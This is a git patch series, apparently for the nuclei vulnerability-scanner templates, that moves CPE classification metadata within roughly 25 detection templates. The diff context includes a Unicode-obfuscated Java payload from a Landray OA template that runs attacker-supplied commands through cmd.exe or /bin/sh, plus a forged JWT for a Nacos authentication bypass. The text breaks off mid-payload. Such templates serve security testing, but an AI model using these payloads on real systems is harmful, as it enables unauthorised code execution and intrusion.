490a004630440220339262dc59b62cb3b19303288bfc967cdda661cd394c67e7bb57ba997007cc9f022006e52d3e51f444f1c203c2d37c8ef2338c87e559a1a995e15d484b232de7935a:922c64590222798bb761d5b6d8e72950 diff --git a/http/vulnerabilities/zzzcms/zzzcms-xss.yaml b/http/vulnerabilities/zzzcms/zzzcms-xss.yaml index db98cd5423..5231cfe166 100644 --- a/http/vulnerabilities/zzzcms/zzzcms-xss.yaml +++ b/http/vulnerabilities/zzzcms/zzzcms-xss.yaml @@ -12,8 +12,12 @@ info: max-request: 1 shodan-query: html:"ZzzCMS" fofa-query: title="ZzzCMS" + product: zzzcms + vendor: zzzcms tags: zzzcms,xss + classification: + cpe: cpe:2.3:a:zzzcms:zzzcms:*:*:*:*:*:*:*:* http: - raw: - | @@ -37,4 +41,4 @@ http: - type: status status: - 200 -# digest: 4a0a0047304502203da161999a9594847976e0d7b9749e60772c7ac74b5ca9ddcf84f34b5d5f220c022100e6beaed8d32aec35a9623a5be2ab607e6688f721b74e8dd896284d327f071a8a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502203da161999a9594847976e0d7b9749e60772c7ac74b5ca9ddcf84f34b5d5f220c022100e6beaed8d32aec35a9623a5be2ab607e6688f721b74e8dd896284d327f071a8a:922c64590222798bb761d5b6d8e72950 From b2e470c37e7cb2676ec159c2d1ba8871b2cc7b6c Mon Sep 17 00:00:00 2001 From: Parth Malhotra <28601533+parthmalhotra@users.noreply.github.com> Date: Tue, 10 Sep 2024 14:11:12 +0530 Subject: [PATCH 2/3] Fix classification position Fix classification position --- http/cnvd/2021/CNVD-2021-33202.yaml | 5 +++-- .../credential-stuffing/self-hosted/grafana-login-check.yaml | 4 ++-- http/cves/2024/CVE-2024-4358.yaml | 4 ++-- .../webmethod/webmethod-integration-default-login.yaml | 4 ++-- http/exposed-panels/fortinet/fortisiem-panel.yaml | 4 ++-- http/exposures/configs/vbulletin-path-disclosure.yaml | 4 ++-- http/misconfiguration/graphql/graphql-alias-batching.yaml | 5 +++-- http/misconfiguration/nacos-authentication-bypass.yaml | 5 +++-- http/vulnerabilities/74cms/74cms-weixin-sqli.yaml | 5 +++-- .../landray/landray-oa-sysSearchMain-editParam-rce.yaml | 4 ++-- http/vulnerabilities/microsoft/office-webapps-ssrf.yaml | 4 ++-- http/vulnerabilities/other/flir-ax8-rce.yaml | 4 ++-- http/vulnerabilities/other/opencart-core-sqli.yaml | 4 ++-- http/vulnerabilities/ruijie/ruijie-nmc-sync-rce.yaml | 5 +++-- http/vulnerabilities/tongda/tongda-getdata-rce.yaml | 5 +++-- .../weaver/eoffice/weaver-eoffice-file-upload.yaml | 5 +++-- .../weaver/weaver-ecology-getsqldata-sqli.yaml | 5 +++-- .../weaver/weaver-ecology-hrmcareer-sqli.yaml | 5 +++-- http/vulnerabilities/weaver/weaver-jquery-file-upload.yaml | 5 +++-- .../weaver/weaver-ktreeuploadaction-file-upload.yaml | 5 +++-- .../weaver/weaver-office-server-file-upload.yaml | 5 +++-- .../weaver/weaver-uploadoperation-file-upload.yaml | 5 +++-- http/vulnerabilities/wordpress/wp-gallery-file-upload.yaml | 5 +++-- .../yonyou/yonyou-nc-grouptemplet-fileupload.yaml | 5 +++-- http/vulnerabilities/zzzcms/zzzcms-ssrf.yaml | 5 +++-- 25 files changed, 66 insertions(+), 50 deletions(-) diff --git a/http/cnvd/2021/CNVD-2021-33202.yaml b/http/cnvd/2021/CNVD-2021-33202.yaml index 0c44b0cdd8..203f6f0428 100755 --- a/http/cnvd/2021/CNVD-2021-33202.yaml +++ b/http/cnvd/2021/CNVD-2021-33202.yaml @@ -9,6 +9,8 @@ info: reference: - https://github.com/PeiQi0/PeiQi-WIKI-Book/blob/main/docs/wiki/oa/%E6%B3%9B%E5%BE%AEOA/%E6%B3%9B%E5%BE%AEOA%20E-Cology%20LoginSSO.jsp%20SQL%E6%B3%A8%E5%85%A5%E6%BC%8F%E6%B4%9E%20CNVD-2021-33202.md - https://www.cnblogs.com/0day-li/p/14637680.html + classification: + cpe: cpe:2.3:a:weaver:e-cology:*:*:*:*:*:*:*:* metadata: verified: true max-request: 1 @@ -16,8 +18,7 @@ info: product: e-cology vendor: weaver tags: cnvd2021,cnvd,e-cology,sqli - classification: - cpe: cpe:2.3:a:weaver:e-cology:*:*:*:*:*:*:*:* + variables: num: "999999999" diff --git a/http/credential-stuffing/self-hosted/grafana-login-check.yaml b/http/credential-stuffing/self-hosted/grafana-login-check.yaml index 1a087cc186..0c45067e0f 100644 --- a/http/credential-stuffing/self-hosted/grafana-login-check.yaml +++ b/http/credential-stuffing/self-hosted/grafana-login-check.yaml @@ -7,6 +7,8 @@ info: description: Checks for a valid login on self hosted Grafana instance. reference: - https://owasp.org/www-community/attacks/Credential_stuffing + classification: + cpe: cpe:2.3:a:grafana:grafana:*:*:*:*:*:*:*:* metadata: max-request: 1 shodan-query: title:"Grafana" @@ -14,8 +16,6 @@ info: product: grafana vendor: grafana tags: self-hosted,creds-stuffing,login-check,grafana - classification: - cpe: cpe:2.3:a:grafana:grafana:*:*:*:*:*:*:*:* variables: username: "{{username}}" password: "{{password}}" diff --git a/http/cves/2024/CVE-2024-4358.yaml b/http/cves/2024/CVE-2024-4358.yaml index d04b09041b..036ebc41a0 100644 --- a/http/cves/2024/CVE-2024-4358.yaml +++ b/http/cves/2024/CVE-2024-4358.yaml @@ -12,6 +12,8 @@ info: - https://summoning.team/blog/progress-report-server-rce-cve-2024-4358-cve-2024-1800/ - https://github.com/sinsinology/CVE-2024-4358 - https://docs.telerik.com/report-server/knowledge-base/registration-auth-bypass-cve-2024-4358 + classification: + cpe: cpe:2.3:a:progress:telerik_report_server:*:*:*:*:*:*:*:* metadata: verified: true max-request: 2 @@ -19,8 +21,6 @@ info: product: telerik_report_server vendor: progress tags: cve,cve2024,telerik,progress,auth-bypass,instrusive - classification: - cpe: cpe:2.3:a:progress:telerik_report_server:*:*:*:*:*:*:*:* variables: user: "{{rand_base(6)}}" pass: "{{rand_base(8)}}" diff --git a/http/default-logins/webmethod/webmethod-integration-default-login.yaml b/http/default-logins/webmethod/webmethod-integration-default-login.yaml index 8f6de78a7b..5164d6e8c2 100644 --- a/http/default-logins/webmethod/webmethod-integration-default-login.yaml +++ b/http/default-logins/webmethod/webmethod-integration-default-login.yaml @@ -6,6 +6,8 @@ info: severity: high reference: - https://documentation.softwareag.com/ + classification: + cpe: cpe:2.3:a:softwareag:webmethods:*:*:*:*:*:*:*:* metadata: verified: true max-request: 5 @@ -13,8 +15,6 @@ info: product: webmethods vendor: softwareag tags: default-login,webmethod - classification: - cpe: cpe:2.3:a:softwareag:webmethods:*:*:*:*:*:*:*:* flow: http(1) && http(2) http: diff --git a/http/exposed-panels/fortinet/fortisiem-panel.yaml b/http/exposed-panels/fortinet/fortisiem-panel.yaml index f841e44075..0871f5d19a 100644 --- a/http/exposed-panels/fortinet/fortisiem-panel.yaml +++ b/http/exposed-panels/fortinet/fortisiem-panel.yaml @@ -5,6 +5,8 @@ info: author: pussycat0x severity: info description: FortiSIEM login panel was detected. + classification: + cpe: cpe:2.3:a:fortinet:fortisiem:*:*:*:*:*:*:*:* metadata: verified: true max-request: 2 @@ -12,8 +14,6 @@ info: product: fortisiem vendor: fortinet tags: panel,fortisiem - classification: - cpe: cpe:2.3:a:fortinet:fortisiem:*:*:*:*:*:*:*:* flow: http(1) && http(2) http: - method: GET diff --git a/http/exposures/configs/vbulletin-path-disclosure.yaml b/http/exposures/configs/vbulletin-path-disclosure.yaml index 33fb50d173..47e751d7b2 100644 --- a/http/exposures/configs/vbulletin-path-disclosure.yaml +++ b/http/exposures/configs/vbulletin-path-disclosure.yaml @@ -6,6 +6,8 @@ info: severity: info reference: - https://github.com/OWASP/vbscan/blob/master/modules/pathdisclure.pl + classification: + cpe: cpe:2.3:a:vbulletin:vbulletin:*:*:*:*:*:*:*:* metadata: verified: true max-request: 11 @@ -13,8 +15,6 @@ info: product: vbulletin vendor: vbulletin tags: config,exposure,fpd,vbulletin - classification: - cpe: cpe:2.3:a:vbulletin:vbulletin:*:*:*:*:*:*:*:* flow: http(1) && http(2) http: diff --git a/http/misconfiguration/graphql/graphql-alias-batching.yaml b/http/misconfiguration/graphql/graphql-alias-batching.yaml index 87515e3323..91ff139b7d 100644 --- a/http/misconfiguration/graphql/graphql-alias-batching.yaml +++ b/http/misconfiguration/graphql/graphql-alias-batching.yaml @@ -14,13 +14,14 @@ info: - https://cheatsheetseries.owasp.org/cheatsheets/GraphQL_Cheat_Sheet.html - https://graphql.security/ - https://stackoverflow.com/questions/62421352/graphql-difference-between-using-alias-versus-multiple-query-objects-when-doin + classification: + cpe: cpe:2.3:a:graphql:playground:*:*:*:*:node.js:*:*:* metadata: max-request: 2 product: playground vendor: graphql tags: graphql,misconfig - classification: - cpe: cpe:2.3:a:graphql:playground:*:*:*:*:node.js:*:*:* + variables: str: "{{to_lower(rand_text_alpha(5))}}" diff --git a/http/misconfiguration/nacos-authentication-bypass.yaml b/http/misconfiguration/nacos-authentication-bypass.yaml index dc3a661836..f144d590d3 100644 --- a/http/misconfiguration/nacos-authentication-bypass.yaml +++ b/http/misconfiguration/nacos-authentication-bypass.yaml @@ -11,6 +11,8 @@ info: - https://github.com/alibaba/nacos/issues/10060 - https://avd.aliyun.com/detail?id=AVD-2023-1655789 - https://nacos.io/zh-cn/docs/auth.html + classification: + cpe: cpe:2.3:a:alibaba:nacos:*:*:*:*:*:*:*:* metadata: verified: true max-request: 2 @@ -18,8 +20,7 @@ info: product: nacos vendor: alibaba tags: auth-bypass,nacos,misconfig,jwt - classification: - cpe: cpe:2.3:a:alibaba:nacos:*:*:*:*:*:*:*:* + variables: token: eyJhbGciOiJIUzI1NiJ9.eyJzdWIiOiJuYWNvcyIsImV4cCI6OTk5OTk5OTk5OTl9.-isk56R8NfioHVYmpj4oz92nUteNBCN3HRd0-Hfk76g diff --git a/http/vulnerabilities/74cms/74cms-weixin-sqli.yaml b/http/vulnerabilities/74cms/74cms-weixin-sqli.yaml index b4b482414e..a5823b9e7e 100644 --- a/http/vulnerabilities/74cms/74cms-weixin-sqli.yaml +++ b/http/vulnerabilities/74cms/74cms-weixin-sqli.yaml @@ -8,6 +8,8 @@ info: There is a libxml_disable_entity_loader function to prevent XML eXternal Entity Injection, but this function needs to be customized by the user. If the user does not customize it, there will be no filtering, which leads to SQL injection vulnerabilities. reference: - https://cn-sec.com/archives/25900.html + classification: + cpe: cpe:2.3:a:74cms:74cms:*:*:*:*:*:*:*:* metadata: verified: true max-request: 1 @@ -15,8 +17,7 @@ info: product: 74cms vendor: 74cms tags: 74cms,weixin,sqli - classification: - cpe: cpe:2.3:a:74cms:74cms:*:*:*:*:*:*:*:* + variables: num: '999999999' diff --git a/http/vulnerabilities/landray/landray-oa-sysSearchMain-editParam-rce.yaml b/http/vulnerabilities/landray/landray-oa-sysSearchMain-editParam-rce.yaml index 5cd1adefe4..8317ae79d5 100755 --- a/http/vulnerabilities/landray/landray-oa-sysSearchMain-editParam-rce.yaml +++ b/http/vulnerabilities/landray/landray-oa-sysSearchMain-editParam-rce.yaml @@ -8,6 +8,8 @@ info: reference: - https://www.modb.pro/db/555240 - https://github.com/mhaskar/XMLDecoder-payload-generator + classification: + cpe: cpe:2.3:a:landray:landray_office_automation:*:*:*:*:*:*:*:* metadata: verified: true max-request: 1 @@ -15,8 +17,6 @@ info: product: landray_office_automation vendor: landray tags: landray,rce - classification: - cpe: cpe:2.3:a:landray:landray_office_automation:*:*:*:*:*:*:*:* variables: payload: '{"body":{"file":"/sys/search/sys_search_main/sysSearchMain.do?method=editParam"}}&fdParemNames=11&fdParameters=\u0020\u0020\u0020\u0020\u0062\u006f\u006f\u006c\u0065\u0061\u006e\u0020\u0066\u006c\u0061\u0067\u0020\u003d\u0020\u0066\u0061\u006c\u0073\u0065\u003b\u0054\u0068\u0072\u0065\u0061\u0064\u0047\u0072\u006f\u0075\u0070\u0020\u0067\u0072\u006f\u0075\u0070\u0020\u003d\u0020\u0054\u0068\u0072\u0065\u0061\u0064\u002e\u0063\u0075\u0072\u0072\u0065\u006e\u0074\u0054\u0068\u0072\u0065\u0061\u0064\u0028\u0029\u002e\u0067\u0065\u0074\u0054\u0068\u0072\u0065\u0061\u0064\u0047\u0072\u006f\u0075\u0070\u0028\u0029\u003b\u006a\u0061\u0076\u0061\u002e\u006c\u0061\u006e\u0067\u002e\u0072\u0065\u0066\u006c\u0065\u0063\u0074\u002e\u0046\u0069\u0065\u006c\u0064\u0020\u0066\u0020\u003d\u0020\u0067\u0072\u006f\u0075\u0070\u002e\u0067\u0065\u0074\u0043\u006c\u0061\u0073\u0073\u0028\u0029\u002e\u0067\u0065\u0074\u0044\u0065\u0063\u006c\u0061\u0072\u0065\u0064\u0046\u0069\u0065\u006c\u0064\u0028\u0022\u0074\u0068\u0072\u0065\u0061\u0064\u0073\u0022\u0029\u003b\u0066\u002e\u0073\u0065\u0074\u0041\u0063\u0063\u0065\u0073\u0073\u0069\u0062\u006c\u0065\u0028\u0074\u0072\u0075\u0065\u0029\u003b\u0054\u0068\u0072\u0065\u0061\u0064\u005b\u005d\u0020\u0074\u0068\u0072\u0065\u0061\u0064\u0073\u0020\u003d\u0020\u0028\u0054\u0068\u0072\u0065\u0061\u0064\u005b\u005d\u0029\u0020\u0066\u002e\u0067\u0065\u0074\u0028\u0067\u0072\u006f\u0075\u0070\u0029\u003b\u0066\u006f\u0072\u0020\u0028\u0069\u006e\u0074\u0020\u0069\u0020\u003d\u0020\u0030\u003b\u0020\u0069\u0020\u003c\u0020\u0074\u0068\u0072\u0065\u0061\u0064\u0073\u002e\u006c\u0065\u006e\u0067\u0074\u0068\u003b\u0020\u0069\u002b\u002b\u0029\u0020\u007b\u0020\u0074\u0072\u0079\u0020\u007b\u0020\u0054\u0068\u0072\u0065\u0061\u0064\u0020\u0074\u0020\u003d\u0020\u0074\u0068\u0072\u0065\u0061\u0064\u0073\u005b\u0069\u005d\u003b\u0069\u0066\u0020\u0028\u0074\u0020\u003d\u003d\u0020\u006e\u0075\u006c\u006c\u0029\u0020\u007b\u0020\u0063\u006f\u006e\u0074\u0069\u006e\u0075\u0065\u003b\u0020\u007d\u0053\u0074\u0072\u0069\u006e\u0067\u0020\u0073\u0074\u0072\u0020\u003d\u0020\u0074\u002e\u0067\u0065\u0074\u004e\u0061\u006d\u0065\u0028\u0029\u003b\u0069\u0066\u0020\u0028\u0073\u0074\u0072\u002e\u0063\u006f\u006e\u0074\u0061\u0069\u006e\u0073\u0028\u0022\u0065\u0078\u0065\u0063\u0022\u0029\u0020\u007c\u007c\u0020\u0021\u0073\u0074\u0072\u002e\u0063\u006f\u006e\u0074\u0061\u0069\u006e\u0073\u0028\u0022\u0068\u0074\u0074\u0070\u0022\u0029\u0029\u0020\u007b\u0020\u0063\u006f\u006e\u0074\u0069\u006e\u0075\u0065\u003b\u0020\u007d\u0066\u0020\u003d\u0020\u0074\u002e\u0067\u0065\u0074\u0043\u006c\u0061\u0073\u0073\u0028\u0029\u002e\u0067\u0065\u0074\u0044\u0065\u0063\u006c\u0061\u0072\u0065\u0064\u0046\u0069\u0065\u006c\u0064\u0028\u0022\u0074\u0061\u0072\u0067\u0065\u0074\u0022\u0029\u003b\u0066\u002e\u0073\u0065\u0074\u0041\u0063\u0063\u0065\u0073\u0073\u0069\u0062\u006c\u0065\u0028\u0074\u0072\u0075\u0065\u0029\u003b\u004f\u0062\u006a\u0065\u0063\u0074\u0020\u006f\u0062\u006a\u0020\u003d\u0020\u0066\u002e\u0067\u0065\u0074\u0028\u0074\u0029\u003b\u0069\u0066\u0020\u0028\u0021\u0028\u006f\u0062\u006a\u0020\u0069\u006e\u0073\u0074\u0061\u006e\u0063\u0065\u006f\u0066\u0020\u0052\u0075\u006e\u006e\u0061\u0062\u006c\u0065\u0029\u0029\u0020\u007b\u0020\u0063\u006f\u006e\u0074\u0069\u006e\u0075\u0065\u003b\u0020\u007d\u0066\u0020\u003d\u0020\u006f\u0062\u006a\u002e\u0067\u0065\u0074\u0043\u006c\u0061\u0073\u0073\u0028\u0029\u002e\u0067\u0065\u0074\u0044\u0065\u0063\u006c\u0061\u0072\u0065\u0064\u0046\u0069\u0065\u006c\u0064\u0028\u0022\u0074\u0068\u0069\u0073\u0024\u0030\u0022\u0029\u003b\u0066\u002e\u0073\u0065\u0074\u0041\u0063\u0063\u0065\u0073\u0073\u0069\u0062\u006c\u0065\u0028\u0074\u0072\u0075\u0065\u0029\u003b\u006f\u0062\u006a\u0020\u003d\u0020\u0066\u002e\u0067\u0065\u0074\u0028\u006f\u0062\u006a\u0029\u003b\u0074\u0072\u0079\u0020\u007b\u0020\u0066\u0020\u003d\u0020\u006f\u0062\u006a\u002e\u0067\u0065\u0074\u0043\u006c\u0061\u0073\u0073\u0028\u0029\u002e\u0067\u0065\u0074\u0044\u0065\u0063\u006c\u0061\u0072\u0065\u0064\u0046\u0069\u0065\u006c\u0064\u0028\u0022\u0068\u0061\u006e\u0064\u006c\u0065\u0072\u0022\u0029\u003b\u0020\u007d\u0020\u0063\u0061\u0074\u0063\u0068\u0020\u0028\u004e\u006f\u0053\u0075\u0063\u0068\u0046\u0069\u0065\u006c\u0064\u0045\u0078\u0063\u0065\u0070\u0074\u0069\u006f\u006e\u0020\u0065\u0029\u0020\u007b\u0020\u0066\u0020\u003d\u0020\u006f\u0062\u006a\u002e\u0067\u0065\u0074\u0043\u006c\u0061\u0073\u0073\u0028\u0029\u002e\u0067\u0065\u0074\u0053\u0075\u0070\u0065\u0072\u0063\u006c\u0061\u0073\u0073\u0028\u0029\u002e\u0067\u0065\u0074\u0053\u0075\u0070\u0065\u0072\u0063\u006c\u0061\u0073\u0073\u0028\u0029\u002e\u0067\u0065\u0074\u0044\u0065\u0063\u006c\u0061\u0072\u0065\u0064\u0046\u0069\u0065\u006c\u0064\u0028\u0022\u0068\u0061\u006e\u0064\u006c\u0065\u0072\u0022\u0029\u003b\u0020\u007d\u0066\u002e\u0073\u0065\u0074\u0041\u0063\u0063\u0065\u0073\u0073\u0069\u0062\u006c\u0065\u0028\u0074\u0072\u0075\u0065\u0029\u003b\u006f\u0062\u006a\u0020\u003d\u0020\u0066\u002e\u0067\u0065\u0074\u0028\u006f\u0062\u006a\u0029\u003b\u0074\u0072\u0079\u0020\u007b\u0020\u0066\u0020\u003d\u0020\u006f\u0062\u006a\u002e\u0067\u0065\u0074\u0043\u006c\u0061\u0073\u0073\u0028\u0029\u002e\u0067\u0065\u0074\u0053\u0075\u0070\u0065\u0072\u0063\u006c\u0061\u0073\u0073\u0028\u0029\u002e\u0067\u0065\u0074\u0044\u0065\u0063\u006c\u0061\u0072\u0065\u0064\u0046\u0069\u0065\u006c\u0064\u0028\u0022\u0067\u006c\u006f\u0062\u0061\u006c\u0022\u0029\u003b\u0020\u007d\u0020\u0063\u0061\u0074\u0063\u0068\u0020\u0028\u004e\u006f\u0053\u0075\u0063\u0068\u0046\u0069\u0065\u006c\u0064\u0045\u0078\u0063\u0065\u0070\u0074\u0069\u006f\u006e\u0020\u0065\u0029\u0020\u007b\u0020\u0066\u0020\u003d\u0020\u006f\u0062\u006a\u002e\u0067\u0065\u0074\u0043\u006c\u0061\u0073\u0073\u0028\u0029\u002e\u0067\u0065\u0074\u0044\u0065\u0063\u006c\u0061\u0072\u0065\u0064\u0046\u0069\u0065\u006c\u0064\u0028\u0022\u0067\u006c\u006f\u0062\u0061\u006c\u0022\u0029\u003b\u0020\u007d\u0066\u002e\u0073\u0065\u0074\u0041\u0063\u0063\u0065\u0073\u0073\u0069\u0062\u006c\u0065\u0028\u0074\u0072\u0075\u0065\u0029\u003b\u006f\u0062\u006a\u0020\u003d\u0020\u0066\u002e\u0067\u0065\u0074\u0028\u006f\u0062\u006a\u0029\u003b\u0066\u0020\u003d\u0020\u006f\u0062\u006a\u002e\u0067\u0065\u0074\u0043\u006c\u0061\u0073\u0073\u0028\u0029\u002e\u0067\u0065\u0074\u0044\u0065\u0063\u006c\u0061\u0072\u0065\u0064\u0046\u0069\u0065\u006c\u0064\u0028\u0022\u0070\u0072\u006f\u0063\u0065\u0073\u0073\u006f\u0072\u0073\u0022\u0029\u003b\u0066\u002e\u0073\u0065\u0074\u0041\u0063\u0063\u0065\u0073\u0073\u0069\u0062\u006c\u0065\u0028\u0074\u0072\u0075\u0065\u0029\u003b\u006a\u0061\u0076\u0061\u002e\u0075\u0074\u0069\u006c\u002e\u004c\u0069\u0073\u0074\u0020\u0070\u0072\u006f\u0063\u0065\u0073\u0073\u006f\u0072\u0073\u0020\u003d\u0020\u0028\u006a\u0061\u0076\u0061\u002e\u0075\u0074\u0069\u006c\u002e\u004c\u0069\u0073\u0074\u0029\u0020\u0028\u0066\u002e\u0067\u0065\u0074\u0028\u006f\u0062\u006a\u0029\u0029\u003b\u0066\u006f\u0072\u0020\u0028\u0069\u006e\u0074\u0020\u006a\u0020\u003d\u0020\u0030\u003b\u0020\u006a\u0020\u003c\u0020\u0070\u0072\u006f\u0063\u0065\u0073\u0073\u006f\u0072\u0073\u002e\u0073\u0069\u007a\u0065\u0028\u0029\u003b\u0020\u002b\u002b\u006a\u0029\u0020\u007b\u0020\u004f\u0062\u006a\u0065\u0063\u0074\u0020\u0070\u0072\u006f\u0063\u0065\u0073\u0073\u006f\u0072\u0020\u003d\u0020\u0070\u0072\u006f\u0063\u0065\u0073\u0073\u006f\u0072\u0073\u002e\u0067\u0065\u0074\u0028\u006a\u0029\u003b\u0066\u0020\u003d\u0020\u0070\u0072\u006f\u0063\u0065\u0073\u0073\u006f\u0072\u002e\u0067\u0065\u0074\u0043\u006c\u0061\u0073\u0073\u0028\u0029\u002e\u0067\u0065\u0074\u0044\u0065\u0063\u006c\u0061\u0072\u0065\u0064\u0046\u0069\u0065\u006c\u0064\u0028\u0022\u0072\u0065\u0071\u0022\u0029\u003b\u0066\u002e\u0073\u0065\u0074\u0041\u0063\u0063\u0065\u0073\u0073\u0069\u0062\u006c\u0065\u0028\u0074\u0072\u0075\u0065\u0029\u003b\u004f\u0062\u006a\u0065\u0063\u0074\u0020\u0072\u0065\u0071\u0020\u003d\u0020\u0066\u002e\u0067\u0065\u0074\u0028\u0070\u0072\u006f\u0063\u0065\u0073\u0073\u006f\u0072\u0029\u003b\u004f\u0062\u006a\u0065\u0063\u0074\u0020\u0072\u0065\u0073\u0070\u0020\u003d\u0020\u0072\u0065\u0071\u002e\u0067\u0065\u0074\u0043\u006c\u0061\u0073\u0073\u0028\u0029\u002e\u0067\u0065\u0074\u004d\u0065\u0074\u0068\u006f\u0064\u0028\u0022\u0067\u0065\u0074\u0052\u0065\u0073\u0070\u006f\u006e\u0073\u0065\u0022\u002c\u0020\u006e\u0065\u0077\u0020\u0043\u006c\u0061\u0073\u0073\u005b\u0030\u005d\u0029\u002e\u0069\u006e\u0076\u006f\u006b\u0065\u0028\u0072\u0065\u0071\u002c\u0020\u006e\u0065\u0077\u0020\u004f\u0062\u006a\u0065\u0063\u0074\u005b\u0030\u005d\u0029\u003b\u0073\u0074\u0072\u0020\u003d\u0020\u0028\u0053\u0074\u0072\u0069\u006e\u0067\u0029\u0020\u0072\u0065\u0071\u002e\u0067\u0065\u0074\u0043\u006c\u0061\u0073\u0073\u0028\u0029\u002e\u0067\u0065\u0074\u004d\u0065\u0074\u0068\u006f\u0064\u0028\u0022\u0067\u0065\u0074\u0048\u0065\u0061\u0064\u0065\u0072\u0022\u002c\u0020\u006e\u0065\u0077\u0020\u0043\u006c\u0061\u0073\u0073\u005b\u005d\u007b\u0053\u0074\u0072\u0069\u006e\u0067\u002e\u0063\u006c\u0061\u0073\u0073\u007d\u0029\u002e\u0069\u006e\u0076\u006f\u006b\u0065\u0028\u0072\u0065\u0071\u002c\u0020\u006e\u0065\u0077\u0020\u004f\u0062\u006a\u0065\u0063\u0074\u005b\u005d\u007b\u0022\u0054\u0065\u0073\u0074\u0022\u007d\u0029\u003b\u0069\u0066\u0020\u0028\u0073\u0074\u0072\u0020\u0021\u003d\u0020\u006e\u0075\u006c\u006c\u0020\u0026\u0026\u0020\u0021\u0073\u0074\u0072\u002e\u0069\u0073\u0045\u006d\u0070\u0074\u0079\u0028\u0029\u0029\u0020\u007b\u0020\u0072\u0065\u0073\u0070\u002e\u0067\u0065\u0074\u0043\u006c\u0061\u0073\u0073\u0028\u0029\u002e\u0067\u0065\u0074\u004d\u0065\u0074\u0068\u006f\u0064\u0028\u0022\u0073\u0065\u0074\u0053\u0074\u0061\u0074\u0075\u0073\u0022\u002c\u0020\u006e\u0065\u0077\u0020\u0043\u006c\u0061\u0073\u0073\u005b\u005d\u007b\u0069\u006e\u0074\u002e\u0063\u006c\u0061\u0073\u0073\u007d\u0029\u002e\u0069\u006e\u0076\u006f\u006b\u0065\u0028\u0072\u0065\u0073\u0070\u002c\u0020\u006e\u0065\u0077\u0020\u004f\u0062\u006a\u0065\u0063\u0074\u005b\u005d\u007b\u006e\u0065\u0077\u0020\u0049\u006e\u0074\u0065\u0067\u0065\u0072\u0028\u0032\u0030\u0030\u0029\u007d\u0029\u003b\u0053\u0074\u0072\u0069\u006e\u0067\u005b\u005d\u0020\u0063\u006d\u0064\u0073\u0020\u003d\u0020\u0053\u0079\u0073\u0074\u0065\u006d\u002e\u0067\u0065\u0074\u0050\u0072\u006f\u0070\u0065\u0072\u0074\u0079\u0028\u0022\u006f\u0073\u002e\u006e\u0061\u006d\u0065\u0022\u0029\u002e\u0074\u006f\u004c\u006f\u0077\u0065\u0072\u0043\u0061\u0073\u0065\u0028\u0029\u002e\u0063\u006f\u006e\u0074\u0061\u0069\u006e\u0073\u0028\u0022\u0077\u0069\u006e\u0064\u006f\u0077\u0022\u0029\u0020\u003f\u0020\u006e\u0065\u0077\u0020\u0053\u0074\u0072\u0069\u006e\u0067\u005b\u005d\u007b\u0022\u0063\u006d\u0064\u002e\u0065\u0078\u0065\u0022\u002c\u0020\u0022\u002f\u0063\u0022\u002c\u0020\u0073\u0074\u0072\u007d\u0020\u003a\u0020\u006e\u0065\u0077\u0020\u0053\u0074\u0072\u0069\u006e\u0067\u005b\u005d\u007b\u0022\u002f\u0062\u0069\u006e\u002f\u0073\u0068\u0022\u002c\u0020\u0022\u002d\u0063\u0022\u002c\u0020\u0073\u0074\u0072\u007d\u003b\u0053\u0074\u0072\u0069\u006e\u0067\u0020\u0063\u0068\u0061\u0072\u0073\u0065\u0074\u004e\u0061\u006d\u0065\u0020\u003d\u0020\u0053\u0079\u0073\u0074\u0065\u006d\u002e\u0067\u0065\u0074\u0050\u0072\u006f\u0070\u0065\u0072\u0074\u0079\u0028\u0022\u006f\u0073\u002e\u006e\u0061\u006d\u0065\u0022\u0029\u002e\u0074\u006f\u004c\u006f\u0077\u0065\u0072\u0043\u0061\u0073\u0065\u0028\u0029\u002e\u0063\u006f\u006e\u0074\u0061\u0069\u006e\u0073\u0028\u0022\u0077\u0069\u006e\u0064\u006f\u0077\u0022\u0029\u0020\u003f\u0020\u0022\u0047\u0042\u004b\u0022\u003a\u0022\u0055\u0054\u0046\u002d\u0038\u0022\u003b\u0062\u0079\u0074\u0065\u005b\u005d\u0020\u0074\u0065\u0078\u0074\u0032\u0020\u003d\u0028\u006e\u0065\u0077\u0020\u006a\u0061\u0076\u0061\u002e\u0075\u0074\u0069\u006c\u002e\u0053\u0063\u0061\u006e\u006e\u0065\u0072\u0028\u0028\u006e\u0065\u0077\u0020\u0050\u0072\u006f\u0063\u0065\u0073\u0073\u0042\u0075\u0069\u006c\u0064\u0065\u0072\u0028\u0063\u006d\u0064\u0073\u0029\u0029\u002e\u0073\u0074\u0061\u0072\u0074\u0028\u0029\u002e\u0067\u0065\u0074\u0049\u006e\u0070\u0075\u0074\u0053\u0074\u0072\u0065\u0061\u006d\u0028\u0029\u002c\u0063\u0068\u0061\u0072\u0073\u0065\u0074\u004e\u0061\u006d\u0065\u0029\u0029\u002e\u0075\u0073\u0065\u0044\u0065\u006c\u0069\u006d\u0069\u0074\u0065\u0072\u0028\u0022\u005c\u005c\u0041\u0022\u0029\u002e\u006e\u0065\u0078\u0074\u0028\u0029\u002e\u0067\u0065\u0074\u0042\u0079\u0074\u0065\u0073\u0028\u0063\u0068\u0061\u0072\u0073\u0065\u0074\u004e\u0061\u006d\u0065\u0029\u003b\u0062\u0079\u0074\u0065\u005b\u005d\u0020\u0072\u0065\u0073\u0075\u006c\u0074\u003d\u0028\u0022\u0045\u0078\u0065\u0063\u0075\u0074\u0065\u003a\u0020\u0020\u0020\u0020\u0022\u002b\u006e\u0065\u0077\u0020\u0053\u0074\u0072\u0069\u006e\u0067\u0028\u0074\u0065\u0078\u0074\u0032\u002c\u0022\u0075\u0074\u0066\u002d\u0038\u0022\u0029\u0029\u002e\u0067\u0065\u0074\u0042\u0079\u0074\u0065\u0073\u0028\u0063\u0068\u0061\u0072\u0073\u0065\u0074\u004e\u0061\u006d\u0065\u0029\u003b\u0074\u0072\u0079\u0020\u007b\u0020\u0043\u006c\u0061\u0073\u0073\u0020\u0063\u006c\u0073\u0020\u003d\u0020\u0043\u006c\u0061\u0073\u0073\u002e\u0066\u006f\u0072\u004e\u0061\u006d\u0065\u0028\u0022\u006f\u0072\u0067\u002e\u0061\u0070\u0061\u0063\u0068\u0065\u002e\u0074\u006f\u006d\u0063\u0061\u0074\u002e\u0075\u0074\u0069\u006c\u002e\u0062\u0075\u0066\u002e\u0042\u0079\u0074\u0065\u0043\u0068\u0075\u006e\u006b\u0022\u0029\u003b\u006f\u0062\u006a\u0020\u003d\u0020\u0063\u006c\u0073\u002e\u006e\u0065\u0077\u0049\u006e\u0073\u0074\u0061\u006e\u0063\u0065\u